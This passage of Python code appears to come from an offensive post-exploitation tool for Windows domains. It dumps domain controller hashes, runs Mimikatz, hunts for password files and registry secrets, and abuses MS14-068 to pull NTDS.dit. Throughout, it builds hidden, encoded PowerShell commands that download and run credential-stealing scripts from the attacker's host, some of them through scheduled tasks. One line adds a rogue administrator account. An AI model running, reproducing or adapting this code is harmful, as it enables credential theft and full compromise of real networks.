Credentials\"\n            for x in tmpPassList:\n                tmpusername=x[0]\n                tmppassword=x[1]\n                for dc in dcList:\n                    passwordHash=None\n                    tmpLoginOK,tmpAdminOK=testDomainCredentials(username,password,passwordHash,dc,domain)\n                    if tmpAdminOK==True:\n                        if tmpusername in domainAdminList:\n                            print \"User: '\"+tmpusername+\"' is a 'Domain Admin'\"\n                            if dcCompromised==False:\n                                print (setColor(\"\\nDumping Hashes from Domain Controller: \"+ip, bold, color=\"green\"))\n                                tmpHashList=dumpDCHashes(ip,domain,username,password)    \n                                if len(tmpHashList)>0:\n                                    addHashes(tmpHashList)\n                                    if ip in uncompromisedHostList:\n                                        uncompromisedHostList.remove(ip)\n                                    analyzeHashes(tmpHashList)\n                                print (setColor(\"\\nDumping Plaintext Credentials from Domain Controller: \"+ip, bold, color=\"red\"))\n                                tmpPasswordList=runMimikatz(ip,domain,username,password,passwordHash)    \n                                for y in tmpPasswordList:\n                                    if y not in userPassList:\n                                        userPassList.append(y)\n\n                        else:\n                            print \"User: '\"+tmpusername+\"' is not a 'Domain Admin'\"\n        else:\n            print \"No credentials found\"\n    cmd = \"umount /tmp/\"+randomFoldername\n    resultList = runCommand(cmd, shell = True, timeout = 15) \n    return tmpPassList\n\ndef findInterestingFiles(targetIP,domain,username,password,passwordHash):\n    findFileList=[]\n    findFileList.append('httpd.conf')\n    findFileList.append('ultravnc.ini')\n    findFileList.append('unattend.xml')\n    findFileList.append('sysprep.xml')\n    findFileList.append('sitemanager.xml')\n    findFileList.append('recentservers.xml')\n    findFileList.append('web.config')\n    findFileList.append('*.kdbx')\n    findFileList.append('*.kdb')\n    findFileList.append('*password*.txt')    \n    findFileList.append('*password*.xls')    \n    findFileList.append('*password*.xlsx')    \n    findFileList.append('*password*.doc')    \n    findFileList.append('*password*.docx')    \n    findFileList.append('*password*.pdf')    \n    searchKeywords=\"$searchKeywords=@(\"\n    for x in findFileList:\n        searchKeywords+=\"'\"+x+\"',\"\n    searchKeywords=searchKeywords[0:-1]+\")\"\n    tmpDriveList=[]\n    print \"[*] Enumerating Drives on Host: \"+targetIP\n    command=powershellCmdStart+' -command \"get-psdrive -psprovider filesystem | Select Name\"'\n    if verbose==True:\n        print command\n    results=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n    tmpResultList=results.split(\"\\n\")\n    count=0\n    for x in tmpResultList:\n        x=x.strip()\n        if len(x)>0:\n            if count>1:\n                tmpDriveList.append(x)\n            count+=1\n    tmpFileList=[]\n    if len(tmpDriveList)>0:\n        print \"[*] Drives found on Host: \"+targetIP\n        tmpDriveList1=[]\n        for x in tmpDriveList:\n            tmpDriveList1.append(x+\"$\")\n        print \", \".join(tmpDriveList1)\n    print \"[*] Finding Files on Host: \"+targetIP\n    for drive in tmpDriveList:\n        command=powershellCmdStart+' -command '+searchKeywords+'; Get-ChildItem -Path \"'+drive+':\\\" -Recurse -Include \"$searchKeywords\" -Name'\n        results=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n        if \"Cannot find path\" not in str(results):\n            tmpResultList=results.split(\"\\n\")\n            for x in tmpResultList:\n                if len(x)>0:\n                    filename=drive+\":\\\\\"+x\n                    if drive+\":\\\\Windows\" not in filename:\n                        if filename not in tmpFileList:\n                            tmpFileList.append(filename)\n    print (setColor(\"[+]\", bold, color=\"green\"))+\" List of Interesting Files Found\"\n    for filename in tmpFileList:\n        print filename\n    #results=runPSEXEC(targetIP, domain, username, password, passwordHash, command)    \n    return tmpFileList\n\ndef findInterestingRegKeys(targetIP,domain,username,password,passwordHash):\n    interestingRegList = []\n    interestingRegList.append(['HKLM\\\\SOFTWARE\\\\RealVNC\\\\WinVNC4','Password'])\n    interestingRegList.append(['HKCU\\\\Software\\\\ORL\\\\WinVNC3', 'Password'])\n    interestingRegList.append(['HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon', 'DefaultUsername'])\n    interestingRegList.append(['HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon', 'DefaultPassword'])\n    interestingRegList.append(['HKLM\\SYSTEM\\ControlSet\\services\\SNMP\\Parameters\\ValidCommunities', ''])\n    interestingRegList.append(['HKU\\\\Software\\\\SimonTatham\\\\Putty\\\\Sessions', ''])\n    for x in interestingRegList:\n        keyPath = x[0]\n        selectedKey = x[1]\n        results = readRemoteRegistry(targetIP,domain,username,password,passwordHash,keyPath,selectedKey)\n        if results != None:\n            if 'Putty' in x[0]:\n                for y in results:\n                    keyPath1 = keyPath + '\\\\' + y\n                    selectedKey = 'ProxyPassword'\n                    results = readRemoteRegistry(targetIP,domain,username,password,passwordHash,keyPath1,selectedKey)\n                    if results != None:\n                        if passwordHash != None:\n                            tmpRegResultList1.append([targetIP,keyPath1 + '\\\\' + selectedKey,results])\n                        else:\n                            tmpRegResultList1.append([targetIP,keyPath1 + '\\\\' + selectedKey,results,])\n            else:\n                if passwordHash != None:\n                    tmpRegResultList1.append([targetIP,keyPath + '\\\\' + selectedKey,results])\n                else:\n                    tmpRegResultList1.append([targetIP,keyPath + '\\\\' + selectedKey,results])\n    return tmpRegResultList1\n\ndef runDumpMSSQL(targetIP,domain,username,password,passwordHash): \n    #https://github.com/NetSPI/PowerUpSQL   \n    print setColor('\\nDumping MSSQL Service Credentials', bold, color='red')\n    tmpPasswordList=[]\n    command=\"-Command (New-Object Net.WebClient).DownloadFile(\\'http://\"+myIP+\":8000/PowerUpSQL.psd1\\','C:\\windows\\\\temp\\PowerUpSQL.psd1'); (New-Object Net.WebClient).DownloadFile(\\'http://\"+myIP+\":8000/PowerUpSQL.ps1\\','C:\\windows\\\\temp\\PowerUpSQL.ps1'); (New-Object Net.WebClient).DownloadFile(\\'http://\"+myIP+\":8000/PowerUpSQL.psm1\\','C:\\windows\\\\temp\\PowerUpSQL.psm1'); (New-Object Net.WebClient).DownloadFile(\\'http://\"+myIP+\":8000/Inveigh.ps1\\','c:\\windows\\\\temp\\Inveigh.ps1'); (New-Object Net.WebClient).DownloadFile(\\'http://\"+myIP+\":8000/Inveigh.ps1\\Get-SQLServiceAccountPwHash3.ps1\\','c:\\windows\\\\temp\\Get-SQLServiceAccountPwHash3.ps1'); Import-Module C:\\windows\\\\temp\\PowerUpSQL.psm1; Import-Module C:\\windows\\\\temp\\Inveigh.ps1; Import-Module C:\\windows\\\\temp\\Get-SQLServiceAccountPwHashes.ps1; Get-SQLServiceAccountPwHashes -Verbose -TimeOut 5 -CaptureIp \"+targetIP\n    #print powershellCmdStart+command\n    results=runWMIEXEC(targetIP, domain, username, password, passwordHash, powershellCmdStart+command)  \n    tmpResultList=results.split(\"\\n\")\n    found1=False\n    found2=False\n    tmpHashList=[]\n    for x in tmpResultList:\n        if found2==True:\n            x=x.strip()\n            if x not in tmpHashList:\n                tmpHashList.append(x) \n        if 'Final List of Captured password hashes:' in x:\n            found1=True\n        if found1==True:\n            if '---------------------------------------' in x:\n                found2=True\n    if len(tmpHashList)<1:\n        print \"No credentials captured\"\n    return tmpHashList        \n\ndef runDumpVault(targetIP,domain,username,password,passwordHash):    \n    tmpResultList=[]\n    tmpPasswordList=[]\n    osArch64=getPowershellVersion(ip,domain,username,password,passwordHash)\n    powershellPath=getPowershellPath(osArch64)\n    powershellArgs=' -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass '\n    command=powershellPath+\" \"+powershellArgs+\" \\\"IEX (New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/Get-VaultCredential.ps1\\'); Get-VaultCredential\\\"\"\n    if verbose==True:\n        print command\n    results=runPSEXEC(targetIP, domain, username, password, passwordHash, powershellCmdStart+command)   \n    tmpResultList=results.split(\"\\n\")\n    return tmpResultList    \n\ndef dumpWifi(targetIP,domain,username,password,passwordHash):\n    #netsh wlan add profile filename=\"wlan.xml\" interface=\"Wireless Network Connection\" user=current\n    #https://gist.github.com/milo2012/7ba74a4451f19a96078597d1f5b85dad/raw/85d9f2364116f99db78bf6993df2d42e106b5baf/wirelessProfile.xml\n    '''\n    <?xml version=\"1.0\" encoding=\"US-ASCII\"?>\n    <WLANProfile xmlns=\"http://www.microsoft.com/networking/WLAN/profile/v1\">\n        <name>SampleWPAPSK</name>\n        <SSIDConfig>\n            <SSID>\n                <name>SampleWPAPSK</name>\n            </SSID>\n        </SSIDConfig>\n        <connectionType>ESS</connectionType>\n        <connectionMode>auto</connectionMode>\n        <autoSwitch>false</autoSwitch>\n        <MSM>\n            <security>\n                <authEncryption>\n                    <authentication>WPAPSK</authentication>\n                    <encryption>TKIP</encryption>\n                    <useOneX>false</useOneX>\n                </authEncryption>\n            </security>\n        </MSM>\n    <sharedKey>\n        <keyType>passPhrase</keyType>\n        <protected>false</protected>\n        <keyMaterial> <!-- insert key here --> </keyMaterial>\n    </sharedKey>    \n    </WLANProfile>\n    '''    \n    domain=domain.strip()\n    results=[]\n    tempFilename = tempfile.NamedTemporaryFile(dir='.').name\n    tempFilename += '.ps1'\n    tempFilename = tempFilename.replace(os.getcwd() + '/', '')\n    osArch64=getPowershellVersion(ip,domain,username,password,passwordHash)\n    powershellPath=getPowershellPath(osArch64)\n    powershellArgs=' -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass '\n    command=powershellPath+\" \"+powershellArgs+\" IEX \\\"(New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/WiFi-Password.psm1\\'); Show-WiFiPassword\\\"\"\n    if verbose==True:\n        print command\n    if len(domain)<1:\n        domain=\"WORKGROUP\"\n    results=runPSEXEC(targetIP, domain, username, password, passwordHash, command)\n    resultList=results.split(\"\\n\")\n    tmpResultList=[]   \n    tmpSSID=''\n    tmpPassword=''\n    tmpAuthType='' \n    for x in resultList:\n        if \"SSID       :\" in x:\n            x=(x.replace(\"SSID       :\",\"\")).strip()\n            if len(x)>0:\n                tmpSSID=x\n        if \"Password   :\" in x:\n            x=(x.replace(\"Password   :\",\"\")).strip()\n            if len(x)>0:\n                tmpPassword=x\n        if \"Auth type  :\" in x:\n            x=(x.replace(\"Auth type  :\",\"\")).strip()\n            if len(x)>0:\n                tmpAuthType=x\n        if len(tmpSSID)>0:\n            tmpResultList.append([tmpSSID,tmpPassword,tmpAuthType])\n    return tmpResultList\n\ndef dumpBrowser(targetIP,domain,username,password,passwordHash):\n    #schtasks.exe /Delete /TN test1 /f\n    #schtasks.exe /Create /RL HIGHEST /RU corp\\milo /TN test1 /SC MONTHLY /M DEC /TR 'C:\\temp\\chrome.bat'\n    #schtasks /Run /TN test1\n    #C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe  -NoLogo -Sta -ep bypass  \"IEX (New-Object Net.WebClient).DownloadString('http://172.16.126.168:8000/BrowserGather.ps1'); Get-ChromeCreds | Out-File C:\\\\temp\\\\chrome.txt“\n\n    tmpPasswordList=[]\n    print \"\\n[*] Checking Installed Browsers on Host: \"+targetIP\n    appList=getInstalledPrograms(targetIP,domain,username,password,passwordHash)\n    for appName in appList:\n        if \"Google Chrome\" in str(appName):\n            print \"Google Chrome\"\n        if \"Mozilla\" in str(appName):\n            print \"Mozilla Firefox\"\n            print \"\\n\"    \n    tmpFound=False\n    tmpBrowserList=[]\n    for appName in appList:\n        if \"Google Chrome\" in str(appName) or \"Mozilla\" in str(appName):    \n            if \"Google Chrome\" in str(appName):\n                tmpBrowserList.append(\"chrome\")\n            if \"Mozilla\" in str(appName):\n                tmpBrowserList.append(\"firefox\")\n            tmpFound=True\n    if tmpFound==False:\n        print \"Google Chrome and Mozilla Firefox Browsers Not Found on Host: \"+targetIP\n    if tmpFound==True:        \n        print \"[*] Checking Currently Logged On Users on Host: \"+targetIP\n        osArch64=getPowershellVersion(ip,domain,username,password,passwordHash)\n        powershellPath=getPowershellPath(osArch64)\n        powershellArgs=' -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass '\n        command=' -Command \"Get-WMIObject -class Win32_ComputerSystem | select username\"'\n        command=powershellPath+\" \"+powershellArgs+command\n        if verbose==True:\n            print command\n        if len(password)>0:\n            passwordHash=None\n        results=runPSEXEC(targetIP, domain, username, password, passwordHash, command)    \n        tmpResultList=results.split(\"\\n\")\n        foundStart=False\n        loggedInUsersList=[]\n        for x in tmpResultList:\n            x=x.strip()            \n            if len(x)>0:\n                if foundStart==True:\n                    if x not in loggedInUsersList:\n                        loggedInUsersList.append(x)                            \n                        print x\n                if '--------' in x:\n                    foundStart=True\n\n        tmpFoundAccounts=[]\n        for x in loggedInUsersList:\n            if \"\\\\\" in x:\n                tmpdomain=(x.split(\"\\\\\")[0]).lower()\n                tmpusername=(x.split(\"\\\\\")[1]).lower()\n                for y in userPassList:\n                    tmpdomain1=(y[0]).lower()\n                    tmpusername1=(y[1]).lower()\n                    if tmpdomain in tmpdomain1 and tmpusername==tmpusername1:\n                        tmpFoundAccounts.append(y)\n            else:\n                tmpusername=x\n                for y in userPassList:\n                    tmpdomain1=(y[0]).lower()\n                    tmpusername1=(y[2]).lower()\n                    if x==tmpusername1:\n                        tmpFoundAccounts.append(y)\n        if len(tmpFoundAccounts)>0:\n            for x in tmpFoundAccounts:\n                tmpdomain=x[0]\n                tmpusername=x[1]\n                tmppassword=x[2]\n\n                #print \"[*] Found the Below Credentials in Database\"\n                #print tabulate(tmpFoundAccounts)\n                if \"firefox\" in tmpBrowserList:\n                    print \"\\n[*] Dumping Firefox Passwords from Host: \"+targetIP                        \n                    print \"[*] Uploading Script to Host: \"+targetIP\n                    outputFilename=generateRandomStr()+\".txt\"\n                    batFilename=generateRandomStr()+\".bat\"\n                    tmpSchedName=generateRandomStr()\n                    #s='IEX (New-Object Net.WebClient).DownloadString(\\'http://'+myIP+':8000/BrowserGather.ps1\\'); Get-ChromeCreds | Out-File C:\\\\windows\\\\temp\\\\'+outputFilename\n                    s='IEX (New-Object Net.WebClient).DownloadString(\\'http://'+myIP+':8000/Get-FoxDump.ps1\\'); Get-FoxDump -OutFile C:\\\\temp\\\\'+outputFilename\n                    encodedPS=powershell_encode(s)\n                    cmd = \"C:\\windows\\sysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass -ec \"+encodedPS\n                    target = open(batFilename, 'w')\n                    target.write(cmd)\n                    target.close()\n                    uploadFile(batFilename,batFilename,targetIP, domain, username, password, passwordHash)\n                \n                    print \"[*] Scheduling Tasks on Host: \"+targetIP\n                    command='schtasks.exe /Delete /TN '+tmpSchedName+' /f'\n                    results=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n                    command='schtasks.exe /Create /RL HIGHEST /RU '+tmpdomain+'\\\\'+tmpusername+' /TN '+tmpSchedName+' /SC MONTHLY /M DEC /TR \"'\"C:\\\\windows\\\\temp\\\\\"+batFilename+\"\\\"\"\n                    if verbose==True:\n                        print command\n                    results=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)   \n                    if \"ERROR\" in str(results):\n                        print results\n                    else: \n                        print \"[*] Running Tasks on Host: \"+targetIP\n                        command='schtasks /Run /TN '+tmpSchedName    \n                        results=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n                        checkComplete=False\n                        while checkComplete==False:\n                            command='schtasks /Query /TN '+tmpSchedName\n                            results=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)            \n                            tmpResultList=results.split(\"\\n\")\n                            for x in tmpResultList:\n                                if tmpSchedName in x:\n                                    if \"Ready\" in x or \"Running\" in x:\n                                        if \"Ready\" in x:\n                                            print \"[*] Removing Tasks from Host: \"+targetIP\n                                            command='schtasks.exe /Delete /TN '+tmpSchedName+' /f'                \n                                            runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n                                            checkComplete=True\n                                        if \"Running\" in x:\n                                            time.sleep(10)\n                        filename=\"C:\\\\temp\\\\\"+outputFilename\n                        '''\n                        tmpFilename=(downloadFile(targetIP,domain,username,password,filename))\n                        tmpFilename1=convertWinToLinux(tmpFilename)\n                        with open(tmpFilename1) as f:\n                            content = f.readlines()     \n                            tmpFound=False                    \n                            for y in content:\n                                if tmpFound==True:\n                                    tmpList1=y.split(\" \")\n                                    tmpPass=''\n                                    tmpUrl=''\n                                    tmpCount=0\n                                    for z in tmpList1:\n                                        if len(z)>0:\n                                            if tmpCount==0:\n                                                tmpPass=z\n                                            else:\n                                                tmpUrl=z\n                                            tmpCount+=1\n                                    tmpPasswordList.append([tmpPass,tmpUrl])\n                                if \"--------\" in y:\n                                    tmpFound=True     \n                        '''\n                if \"chrome\" in tmpBrowserList:\n                    print \"\\n[*] Dumping Chrome Passwords from Host: \"+targetIP                        \n                    print \"[*] Uploading Script to Host: \"+targetIP\n                    outputFilename=generateRandomStr()+\".txt\"\n                    batFilename=generateRandomStr()+\".bat\"\n                    tmpSchedName=generateRandomStr()\n                    #s='IEX (New-Object Net.WebClient).DownloadString(\\'http://'+myIP+':8000/BrowserGather.ps1\\'); Get-ChromeCreds | Out-File C:\\\\windows\\\\temp\\\\'+outputFilename\n                    s='IEX (New-Object Net.WebClient).DownloadString(\\'http://'+myIP+':8000/BrowserGather.ps1\\'); Get-ChromeCreds | Out-File C:\\\\temp\\\\'+outputFilename\n                    encodedPS=powershell_encode(s)\n                    cmd = powershellPath+\" -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass -ec \"+encodedPS\n                    target = open(batFilename, 'w')\n                    target.write(cmd)\n                    target.close()\n                    uploadFile(batFilename,batFilename,targetIP, domain, username, password, passwordHash)\n                \n                    print \"[*] Scheduling Tasks on Host: \"+targetIP\n                    command='schtasks.exe /Delete /TN '+tmpSchedName+' /f'\n                    results=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n                    command='schtasks.exe /Create /RL HIGHEST /RU '+tmpdomain+'\\\\'+tmpusername+' /TN '+tmpSchedName+' /SC MONTHLY /M DEC /TR \"'\"C:\\\\windows\\\\temp\\\\\"+batFilename+\"\\\"\"\n                    if verbose==True:\n                        print command\n                    results=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)   \n                    if \"ERROR\" in str(results):\n                        print results\n                    else: \n                        print \"[*] Running Tasks on Host: \"+targetIP\n                        command='schtasks /Run /TN '+tmpSchedName    \n                        results=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n                        checkComplete=False\n                        while checkComplete==False:\n                            command='schtasks /Query /TN '+tmpSchedName\n                            results=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)            \n                            tmpResultList=results.split(\"\\n\")\n                            for x in tmpResultList:\n                                if tmpSchedName in x:\n                                    if \"Ready\" in x or \"Running\" in x:\n                                        if \"Ready\" in x:\n                                            print \"[*] Removing Tasks from Host: \"+targetIP\n                                            command='schtasks.exe /Delete /TN '+tmpSchedName+' /f'                \n                                            runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n                                            checkComplete=True\n                                        if \"Running\" in x:\n                                            time.sleep(10)\n                        filename=\"C:\\\\temp\\\\\"+outputFilename\n                        tmpFilename=(downloadFile(targetIP,domain,username,password,filename))\n                        with open(tmpFilename) as f:\n                            lines = f.read().splitlines()                        \n                            for z in lines:\n                                print z\n                        os.remove(batFilename)\n        else:\n            print \"[*] No matching credentials found in database\"\n    return tmpPasswordList\n\ndef dumpIIS(targetIP,domain,username,password,passwordHash):  \n    print \"Running Get-Webconfig.ps1 and Get-ApplicationHost.ps1\"\n    tmpResultList=[] \n    tmpPasswordList=[]\n    found=False\n    cmdList=[]\n    osArch64=getPowershellVersion(ip,domain,username,password,passwordHash)\n    powershellPath=getPowershellPath(osArch64)\n    powershellArgs=' -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass '\n    command=powershellPath+\" \"+powershellArgs+\" \\\"IEX (New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/get-applicationhost.ps1\\'); Get-ApplicationHost | Format-Table -Autosize\\\"\"\n    if verbose==True:\n        print command\n    results=runWMIEXEC(targetIP, domain, username, password, passwordHash, powershellCmdStart+command)    \n    print results\n    tmpResultList=results.split(\"\\n\")\n    username=\"\"\n    domain=\"\"\n    password=\"\"\n    if \"Appcmd.exe does not exist in the default location\" not in str(results):\n        return tmpResultList\n    else:\n        return []\n\n#def dumpBrowserCreds():\n    #powershell \"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/sekirkity/BrowserGather/master/BrowserGather.ps1'); Get-ChromeCreds | format-list *\"\n    #powershell \"IEX(new-object net.webclient).downloadstring(\"https://raw.githubusercontent.com/et0x/Get-ChromePasswords/master/Get-ChromePasswords.ps1””\n\ndef localPrivEscalation():\n    cmd='powershell \"IEX (New-Object Net.WebClient).DownloadString(\\'http://is.gd/fVC1Yd\\'); Invoke-Tater -Trigger 1 -Command \"\"net user tater Winter2016 /add && net localgroup administrators tater /add\"\"\"'\n    print cmd\n    return True\n\ndef setDateTime(date1):\n    cmd = 'date -s \"'+date1+'\"'\n    runCommand1(cmd) \n\ndef compareTime(date1,date2):\n    tmpDate1=[]\n    tmp1=date1.split(\" \")\n    count=0\n    for x in tmp1:\n        if len(x)>0:\n            if count==2:\n                day1=x\n            if count==1:\n                mth1=convertMth(x)\n            if (x.count(\":\"))>1:\n                time1=x\n            count+=1\n    year1=tmp1[-1]\n    hour1=time1.split(\":\")[0]\n    min1=time1.split(\":\")[1]\n\n    tmpDate2=[]\n    tmp2=date2.split(\" \")\n    count=0\n    for x in tmp2:\n        if len(x)>0:\n            if count==2:\n                day2=x\n            if count==1:\n                mth2=convertMth(x)\n            if (x.count(\":\"))>1:\n                time2=x\n            count+=1\n    year2=tmp2[-1]\n    hour2=time2.split(\":\")[0]\n    min2=time2.split(\":\")[1]\n\n    if year1==year2 and mth1==mth2 and day1==day2 and hour1==hour2:\n        if (int(min1)-int(min2)<5):\n            return True\n        else:\n            return False\n    else:\n        newDateTime=day1+\" \"+convertMthNum(mth1)+\" \"+year1+\" \"+time1\n        setDateTime(newDateTime)\n        return False\n\n\ndef isOpen(ip,port):\n    global liveList\n    try:\n        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        s.settimeout(5)\n        s.connect((ip, int(port)))\n        if [ip,port] not in liveList:\n            liveList.append([ip,port])\n        s.close()\n        complete=True\n        return True\n    except Exception as e:\n        return False\n\ndef scanThread(ip, port):\n    try:\n        t = threading.Thread(target=isOpen, args=(ip, port))\n        t.start()\n    except Exception as e:\n        pass\n\ndef syncDateTime(dateTime1):\n    print \"[*] Syncing Date/Time with Remote DC\"\n    mth1=dateTime1.split(\" \")[1]    \n    day1=dateTime1.split(\" \")[0]    \n    year1=dateTime1.split(\" \")[-1]    \n    time1=dateTime1.split(\" \")[4]   \n    hour1=time1.split(\":\")[0]\n    minute1=time1.split(\":\")[1]\n    sec1=time1.split(\":\")[2]\n    \n    cmd='timedatectl set-ntp 0'\n    resultList = runCommand(cmd, shell = True, timeout = 30)\n    cmd='date --set '+year1+'-'+convertMth(mth1)+'-'+day1\n    resultList = runCommand(cmd, shell = True, timeout = 30)\n    cmd='date --set '+hour1+':'+minute1+':'+sec1\n    resultList = runCommand(cmd, shell = True, timeout = 30)\n\ndef convertMth(text):\n    if text==\"Jan\":\n        return \"1\"\n    if text==\"Feb\":\n        return \"2\"\n    if text==\"Mar\":\n        return \"3\"\n    if text==\"Apr\":\n        return \"4\"\n    if text==\"May\":\n        return \"5\"\n    if text==\"Jun\":\n        return \"6\"\n    if text==\"Jul\":\n        return \"7\"\n    if text==\"Aug\":\n        return \"8\"\n    if text==\"Sep\":\n        return \"9\"\n    if text==\"Oct\":\n        return \"10\"\n    if text==\"Nov\":\n        return \"11\"\n    if text==\"Dec\":\n        return \"12\"\n\ndef convertMthNum(text):\n    if text==\"1\":\n        return \"Jan\"\n    if text==\"2\":\n        return \"Feb\"\n    if text==\"3\":\n        return \"Mar\"\n    if text==\"4\":\n        return \"Apr\"\n    if text==\"5\":\n        return \"May\"\n    if text==\"6\":\n        return \"Jun\"\n    if text==\"7\":\n        return \"Jul\"\n    if text==\"8\":\n        return \"Aug\"\n    if text==\"9\":\n        return \"Sep\"\n    if text==\"10\":\n        return \"Oct\"\n    if text==\"11\":\n        return \"Nov\"\n    if text==\"12\":\n        return \"Dec\"\n\ndef testMS14_068(ip,domain,username,password,passwordHash):\n    tmpPassList=[]\n    tmpHashList=[]\n    domain,domainFull=reverseLookup(ip)\n    n = NetBIOS(broadcast=True, listen_port=0)\n    netbiosName=''\n    try:\n        netbiosName=n.queryIPForName(ip)[0]\n    except Exeception as e:\n        pass\n    osArch64=getPowershellVersion(ip,domain,username,password,passwordHash)\n    powershellPath=getPowershellPath(osArch64)\n    powershellArgs=' -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass '\n\n    print (setColor(\"\\nTesting MS14-068\", color=\"green\"))\n    #print (setColor(\"\\nTesting MS14-068\", bold, color=\"red\"))\n    dateTime1=str(checkRemoteTime(ip))\n    dateTime2=str(checkCurrentTime())\n\n    if compareTime(dateTime1,dateTime2)==True:\n        print \"[*] Time sync between host and remote server: \"+(setColor(\"OK\", bold, color=\"green\"))\n    else:\n        print \"[*] Time sync between host and remote server: \"+(setColor(\"Failed\", bold, color=\"red\"))\n        syncDateTime(dateTime1)\n    hashes=None\n    w=None\n    target_ip=ip\n    dc_ip=ip\n    address=netbiosName\n    command=powershellPath+\" \"+powershellArgs+\" IEX (New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/Invoke-Mimikatz.ps1\\'); Invoke-Mimikatz -DumpCreds\"\n    dumper=MS14_068(address,target_ip, username, password, domainFull, None, command, None, None, dc_ip)    \n    try:\n        dumper.exploit()\n        tmpPasswordList=parseMimikatzOutput(dumper.getOutput())\n        if len(tmpPasswordList)>0:\n            print \"\\nTesting Credentials\"\n            for y in tmpPasswordList:\n                tmpdomain=y[0]\n                tmpusername=y[1]\n                tmppassword=y[2]\n                tmppasswordHash=None\n                tmpLoginOK,tmpAdminOK=testDomainCredentials(tmpusername,tmppassword,tmppasswordHash,dcList[0],tmpdomain)\n                if tmpAdminOK==True:\n                    if y not in daPassList:\n                        daPassList.append(y)\n                    tmpPassList.append(y)  \n    except Exception as e:\n        pass\n    dumper=None\n    command=powershellPath+\" \"+powershellArgs+\" IEX (New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/Get-PasswordFile.ps1\\'); Get-PasswordFile '\\\\\\\\\"+myIP+\"\\\\guest'\"\n    dumper=MS14_068(address,target_ip, username, password, domainFull, None, command, None, None, dc_ip)    \n    try:\n        dumper.exploit()\n    except Exception as e:\n        pass\n    dumper=None\n    if not os.path.exists(origScriptPath+\"/system\") or not os.path.exists(origScriptPath+\"/ntds\"):\n        print (setColor(\"[-]\", bold, color=\"red\"))+\" Unable to find NTDS.dll and SYSTEM hive\"\n    else:            \n        print (setColor(\"[+]\", bold, color=\"green\"))+\" Downloading NTDS.dll and SYSTEM hive\"            \n        print (setColor(\"[+]\", bold, color=\"green\"))+\" Converting NTDS.dll to NTLM hashes\"            \n        cmd=\"/pentest/libesedb/esedbtools/esedbexport -t /tmp/ \"+origScriptPath+\"/ntds\"\n        resultList = runCommand(cmd, shell = True, timeout = 120)\n        time.sleep(2)\n\n        outputFilename=\"/tmp/NT.out\"\n        cmd=\"python /pentest/ntdsxtract/dsusers.py /tmp/ntds.export/datatable.3 /tmp/ntds.export/link_table.5 /tmp --passwordhashes --lmoutfile /tmp/LM.out --ntoutfile \"+outputFilename+\" --pwdformat john --syshive \"+origScriptPath+\"/system\"\n        resultList = runCommand(cmd, shell = True, timeout = 120)\n\n        if os.path.exists(outputFilename):\n            with open(outputFilename) as f:\n                lines = f.read().splitlines()\n                for x in lines:\n                    if x not in tmpHashList:\n                        tmpHashList.append(x)\n        if len(tmpHashList)>0:\n            dcCompromised=True\n            if ip in uncompromisedHostList:\n                uncompromisedHostList.remove(ip)\n            print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" List of NTLM Hashes\"            \n            for x in tmpHashList:\n                tmpusername=x.split(\":\")[0]\n                tmphash=\"aad3b435b51404eeaad3b435b51404ee:\"+(x.split(\":\")[1]).split(\"$\")[2]\n                tmpuid=(x.split(\":\")[2]).split(\"-\")[7]\n                print tmpusername+\":\"+str(tmpuid)+\":\"+tmphash+\":::\"\n                if [ip,domain,tmpusername,tmphash] not in userHashList:\n                    userHashList.append([ip,domain,tmpusername,tmphash])\n                if tmpusername.lower()==\"administrator\":\n                    if len(domain)<1:\n                        domain=\"WORKGROUP\"\n                    if [ip,domain,tmpusername,tmphash] not in accessAdmHostList:\n                        accessAdmHostList.append([ip,domain,tmpusername,tmphash])\n\n\n            #accessAdmHostList.append()\n    return tmpPassList,tmpHashList\n\ndef cardLuhnChecksumIsValid(card_number):\n    \"\"\" checks to make sure that the card passes a luhn mod-10 checksum \"\"\"\n    sum = 0\n    num_digits = len(card_number)\n    oddeven = num_digits & 1\n    for count in range(num_digits):\n        digit = int(card_number[count])\n        if not (( count & 1 ) ^ oddeven):\n            digit = digit * 2\n        if digit > 9:\n            digit = digit - 9\n        sum = sum + digit\n    return (sum % 10) == 0\n\ndef addPasswords(tmpPasswordList):\n    for x in tmpPasswordList:\n        tmpdomain=x[0]\n        tmpusername=x[1]\n        tmppassword=x[2]\n        if len(tmppassword)>0 and tmppassword!='(null':       \n            if [tmpdomain,tmpusername,tmppassword] not in userPassList:\n                userPassList.append([tmpdomain,tmpusername,tmppassword])\n\ndef addHashes(tmpHashList):\n    for x in tmpHashList:\n        tmpusername=x.split(\":\")[0]\n        tmphash=x.split(\":\")[2]+\":\"+x.split(\":\")[3]\n        if \"\\\\\" in tmpusername: \n            